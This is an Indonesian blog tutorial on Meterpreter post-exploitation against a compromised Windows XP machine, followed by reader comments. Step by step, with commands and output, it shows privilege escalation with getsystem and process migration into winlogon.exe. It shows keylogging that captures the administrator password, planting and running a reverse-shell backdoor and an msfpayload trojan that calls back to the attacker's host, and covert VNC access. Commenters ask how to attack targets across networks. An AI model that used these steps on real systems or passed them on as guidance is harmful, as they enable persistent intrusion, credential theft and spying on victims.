Kali ini, saya akan memberikan beberapa perintah meterpreter yang sering saya gunakan dalam aktivitas exploitasi.
1. Information gathering + Privilege Escalation
a. sysinfo : berfungsi untuk menampilkan informasi dari system yang tereksploitasi.
meterpreter > sysinfo
Computer : ROOT-11E5DB48A8
OS : Windows XP (Build 2600, Service Pack 2).
Architecture : x86
System Language : en_US
Meterpreter : x86/win32
b. pwd : berfungsi untuk menampilkan informasi process work directory.
Output:
meterpreter > pwd
C:\Program Files\Mozilla Firefox
c. getuid : berfungsi untuk menampilkan user id dari system yang tereksploitasi.
Output:
meterpreter > getuid
Server username: ROOT-11E5DB48A8\Administrator
d. getsystem : berfungsi untuk mengangkat hak istimewa (privilege escalation) meterpreter.
meterpreter > getsystem
...got system (via technique 1).
Setelah getsystem dijalankan, maka user id menjadi:
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
e. ps : berfungsi untuk menampilkan daftar process yang sedang berjalan pada system yang terksploitasi.
f. migrate : berfungsi untuk memindahkan service meterpreter ke process lain.
meterpreter > migrate 632
[*] Migrating to 632...
[*] Migration completed successfully.
Note: saya berpindah ke process 632 a.k.a winlogon.exe
g.keyscan_start : berfungsi untuk merekam keystroke keyboard sesuai dengan process id meterpreter
meterpreter > keyscan_start
Starting the keystroke sniffer...
Note: keyscan_start dalam tutorial kali ini, saya merekan keystroke keyboard pada process 632 a.k.a winlogon.exe (sesuai dengan step f).
h. keyscan dump : berfungsi untuk menampilkan hasil dari keyscan_start
meterpreter > keyscan_dump
Dumping captured keystrokes...
red-dragon <Return>
Note: saya berhasil mengambil password administrator =)
i. ipconfig : berfungsi untuk menampilkan configurasi IP milik system yang tereksploitasi
meterpreter > ipconfig
MS TCP Loopback interface
Hardware MAC: 00:00:00:00:00:00
IP Address : 127.0.0.1
Netmask : 255.0.0.0
AMD PCNET Family PCI Ethernet Adapter - Packet Scheduler Miniport
Hardware MAC: 00:50:56:28:dc:a0
IP Address : 172.16.60.128
Netmask : 255.255.255.0
2. Perintah UPLOAD
Saya akan mencoba mengupload 2 backdoor ke dalam system. Sehingga saya dapat mengeksploitasi system tanpa perlu repot-repot.
a. upload Secure Back Door a.k.a sbd.exe
meterpreter > upload /pentest/windows-binaries/tools/sbd.exe C://WINDOWS//system32
[*] uploading : /pentest/windows-binaries/tools/sbd.exe -> C://WINDOWS//system32
[*] uploaded : /pentest/windows-binaries/tools/sbd.exe -> C://WINDOWS//system32\sbd.exe
Note: saya mengupload sbd.exe yang berada di direktory /pentest/windows-binaries/tools/sbd.exe ke direktoy C://WINDOWS//system32
Menjalankan Secure Back Door
meterpreter > execute -H -f "C:/WINDOWS/system32/sbd.exe -q -r 10 -k reddragon -e cmd -p 1000 192.168.1.3"
Process 3364 created.
Mengakses Secure Back Door
root@red-dragon:~# wine /pentest/windows-binaries/tools/sbd.exe -l -k reddragon -p 1000
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\TEMP\gDzCKIoJEf>
Note: saya berhasil masuk ke dalam konsol command prompt tanpa metasploit =)
b. Upload Trojan Horse!
Pertama, buat terlebih dahulu trojan horse milik anda.
root@red-dragon:~# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.3 LPORT=2000 X > /root/evil-trojan.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
Length: 290
Options: {"LHOST"=>"192.168.1.3", "LPORT"=>"2000"}
Note: Saya membuat trojan horse dalam direktori root, dimana victim akan menghubungi 192.168.1.3 a.k.a attacker pada port 2000.
Upload Trojan Horse dengan konsol meterpreter.
meterpreter > upload /root/evil-trojan.exe C://WINDOWS//system32
[*] uploading : /root/evil-trojan.exe -> C://WINDOWS//system32
[*] uploaded : /root/evil-trojan.exe -> C://WINDOWS//system32\evil-trojan.exe
Menjalankan tugas multi handler untuk membuka meterpreter sesi baru.
Dalam konsol metasploit. Masukan perintah berikut:
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LPORT 2000
LPORT => 2000
msf exploit(handler) > exploit -j
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.1.3:2000
[*] Starting the payload handler...
Mengeksekusi evil-trojan.exe.
Note: kali ini, mengeksekusi evil-trojan.exe tidak bisa dilakukan dengan konsol meterpreter layaknya Secure Backdoor. Kita membutuhkan konsol shell a.k.a command prompt untuk mengeksekusinya. Dan pastikan process directory anda berada pada C:/WINDOWS/system32. Untuk mengecek process work directory, gunakan perintah pwd. Jika anda tidak berada pada pwd C:/WINDOWS/system32, lakukan tahap privilege escalation pada BAB 1 tahap E dan F. Ketika mengeksekusi perintah ps, perhatikan baris path. Dan temukan process yang bersumber dari direktori C:/WINDOWS/system32. Dalam kasus ini, saya melakukan migrate ke process 1072 a.k.a svchost.exe.
Buka command prompt dengan perintah:
meterpreter > shell
Process 136 created.
Channel 3 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
Kemudian eksekusi evil-trojan milik kita
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>evil-trojan.exe
evil-trojan.exe
Maka meterpreter sesi baru akan terbuka.
[*] Sending stage (752128 bytes) to 192.168.1.3
exit
[*] Meterpreter session 3 opened (192.168.1.3:2000 -> 192.168.1.3:47571) at 2011-11-27 10:45:25 +0700
3. Remote Desktop
Saya yakin anda mengincar yang satu ini. Langsung saja.
meterpreter > run vnc
[*] Creating a VNC reverse tcp stager: LHOST=192.168.1.3 LPORT=4545)
[*] Running payload handler
[*] VNC stager executable 73802 bytes long
[*] Uploaded the VNC agent to C:\WINDOWS\TEMP\eZeNeVFVL.exe (must be deleted manually)
[*] Executing the VNC agent with endpoint 192.168.1.3:4545...
meterpreter > Connected to RFB server, using protocol version 3.8
Enabling TightVNC protocol extensions
No authentication needed
Authentication successful
Desktop name "root-11e5db48a8"
VNC server default format:
32 bits per pixel.
Least significant byte first in each pixel.
True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Using default colormap which is TrueColor. Pixel format:
32 bits per pixel.
Least significant byte first in each pixel.
True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Using shared memory PutImage
Same machine: preferring raw encoding
4. Key-logger V2
Kali ini berbeda dengan keyscan_start di tahap sebelumnya. Key-logger ini merekam setiap keystroke tanpa memandang pwd meteterpreter.
meterpreter > run keylogrecorder
[*] explorer.exe Process found, migrating into 2532
[*] Migration Successful!!
[*] Starting the keystroke sniffer...
[*] Keystrokes being saved in to /root/.msf4/logs/scripts/keylogrecorder/192.168.1.3_20111127.3406.txt
[*] Recording
Untuk melihat hasil Key-logger, buka file /root/.msf4/logs/scripts/keylogrecorder/192.168.1.3_20111127.3406.txt sesuai dengan output run keylogrecorder.
Mana yang anda suka? =)
created by:
red-dragon
supported by:
Blue Dragon
Loved by:
Yoshephine Handini
Yang terhormat kepada red-dragon/blue-dragon
ReplyDeletesaya selalu bermain dengan metasploit, baik itu ketika berhadapan dengan post yang terbuka maupun ketika berhadapan dengan firewall. Tetapi saya selalu gagal, hingga teman saya mengatakan bahwa IP setiap detik selalu berubah. Cara hack mesin yang IP-nya selalu berubah gimana ya ? Trima kasih
coba metode dns spoof di sini
ReplyDeletehttp://double-dragon.blogspot.com/2011/10/advance-metasploit-bypass-firewall.html
sudah saya lakukan, apa yang terjadi ?
ReplyDeleteexploit yang digunakan tidak cocok sehingga saya tidak mendapatkan hak akses meterpreter ...
mohon bantu saya, saya selalu menemui jalan buntu X_X
Dimana kendalanya? Port? Atau payload nya yang tidak cocok?
ReplyDeleteketika menulis perintah "exploit" atau "sessions" di situ tertulis "exploit not match" ..
ReplyDeletesaya juga bingung dimana yang salah ?
Xenon-id
penggunaan metasploit untuk beda jaringan/via modem internet bagaimana ya? saya agak sedikit bingung. Bisa dibuatkan tutorialnya tidak??
ReplyDeleteModem ya? Tahukah kamu IP address ketika menggunakan modem bersifat private? Artinya mustahil melakukan PING antar client. Namun hal ini berbeda jika anda menggunakan modem fl3x1. Mungkin ini bug dari vendor tersebut dimana client mampu melakukan file sharing dengan client lainnya. Ini sama seperti WAN (Wide Area Network)
ReplyDelete=)
om, punya ane gk bisa run vnc, gmana tu permasalahannya? ane pake bugtraq, (kurang lebih sama ama backtrack)
ReplyDeleteJazakumullah khoir ilmunya
ReplyDelete